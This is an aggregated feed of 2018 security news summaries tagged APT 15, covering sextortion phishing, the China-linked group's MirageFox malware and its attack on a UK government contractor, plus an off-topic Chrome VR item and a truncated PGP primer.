2018-08-02 15:11:04 | The Year Targeted Phishing Went Mainstream (lien direct) | A story published here on July 12 about a new sextortion-based phishing scheme that invokes a real password used by each recipient has become the most-read piece on KrebsOnSecurity since this site launched in 2009. And with good reason -- sex sells (the second most-read piece here was my 2015 scoop about the Ashley Madison hack). But beneath the lurid allure of both stories lies a more unsettling reality: It has never been easier for scam artists to launch convincing, targeted phishing and extortion scams that are automated on a global scale. And given the sheer volume of hacked and stolen personal data now available online, it seems almost certain we will soon witness many variations on these phishing campaigns that leverage customized data elements to enhance their effectiveness. | APT 15 | ||
 |
2018-07-31 14:03:05 | Google Chrome launches on Daydream headsets, could make enterprise VR training a reality (lien direct) | Google Chrome is now accessible for Daydream View and the Lenovo Mirage Solo, which could transform business training techniques. | APT 15 | ||
 |
2018-06-19 21:58:03 | APT15 Pokes Its Head Out With Upgraded MirageFox RAT (lien direct) | This is the first evidence of the China-linked threat actor's activity since hacked the U.K. government and military in 2017 (which wasn't made public until 2018). | APT 15 | ||
|
2018-06-18 12:41:02 | China-Linked APT15 is still very active, experts found its new malware tracked as \'MirageFox\' (lien direct) | Following the recent hack of a US Navy contractor security experts found evidence of very recent activity by the China-linked APT group tracked as APT15. The China-linked APT15 group (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has developed a new strain of malware borrowing the code from one of the tool he used in past […] | APT 15 APT 25 | ||
|
2018-06-18 04:38:03 | China-Linked APT15 Develops New \'MirageFox\' Malware (lien direct) | A cyber-espionage group believed to be operating out of China has developed a new piece of malware that appears to be based on one of the first tools used by the threat actor. | APT 15 | ||
|
2018-03-26 13:00:00 | Explain PGP Encryption: An Operational Introduction (lien direct) |
If you don’t already know what Pretty Good Privacy (PGP) is; you may have heard of PGP before, perhaps during a discussion on how to secure your communications, or perhaps in one of those how-to maintain privacy guides. PGP is a popular solution for encrypting, decrypting, signing, and verifying messages and files, often found in email communications and package repository identity verification (because security matters).
Most generic guides simply explain PGP at a high-level or how to encrypt and decrypt messages using specific software, and not much more than that. The goal of this introduction to PGP is to illustrate a more timeless and operational approach to using PGP safely, with respect to both information security and operational security.
Firstly, we introduce PGP theoretically and practically, this means understanding how PGP works and what we can actually do with PGP. To better understand our security stance, we assess the CIA Triad, a theoretical Information Security model, that considers the confidentiality, integrity, and availability of information. Next, we get familiar with our threat model (similar to OPSEC Model); in this step, we analyze personalized risks and threats. To mitigate any identified threats and reduce risk, we implement operational security practices.
At a more concise glance, we will discuss the following:
PGP, OpenPGP & GPG
Public & Private Key Pairs
Information Security (CIA Triad)
Confidentiality: message encryption, information storage
Integrity: message/file authenticity, web of trust
Availability: key servers, web of trust, metadata
Assessing Threats & Risk
Threat Modeling
Operational Security
Clients & Use Guides: Windows, Linux, Mac, Web
With that caveat in mind, let’s jump straight in.
PGP, OpenPGP & GPG: What is it?
PGP is a protocol used for encrypting, decrypting and signing messages or files using a key pair. PGP is primarily used for encrypting communications at the Application layer, typically used for one-on-one encrypted messaging. You may find yourself needing to use PGP if you want to be certain that only the intended receiver can access your private message, thwarting the efforts of intercepting parties, or if you just want to verify the sender’s identity.
There are different variations of PGP: OpenPGP, PGP and GPG, but they generally all do the same thing. Here is the quick terminology run-down:
PGP: Pretty Good Privacy, original proprietary protocol. Released in 1991.
OpenPGP: Pretty Good Privacy, but it is an open-source version, and it has become the universally-accepted PGP standard. Released in 1997.
GPG: GNU Privacy Guard, another popular solution that follows OpenPGP standards. Released in 1999.
When someone says PGP, it is generally s |
APT 15 | ||
|
2018-03-13 16:16:02 | China-Linked APT15 Used Myriad of New Tools To Hack UK Government Contractor (lien direct) | Cyber espionage group APT15 is back, this time stealing sensitive data from a UK government contractor. | APT 15 | ||
|
2018-03-12 18:07:04 | China-Linked APT15 used new backdoors in attack against UK Government\'s service provider (lien direct) | China-Linked APT15 used new backdoors is an attack that is likely part of a wider operation aimed at contractors at various UK government departments and military organizations. Last week Ahmed Zaki, a senior malware researcher at NCC Group, presented at the Kaspersky's Security Analyst Summit (SAS), details of a malware-based attack against the service provider for the […] | APT 15 |
To see everything:
Our RSS (filtrered)
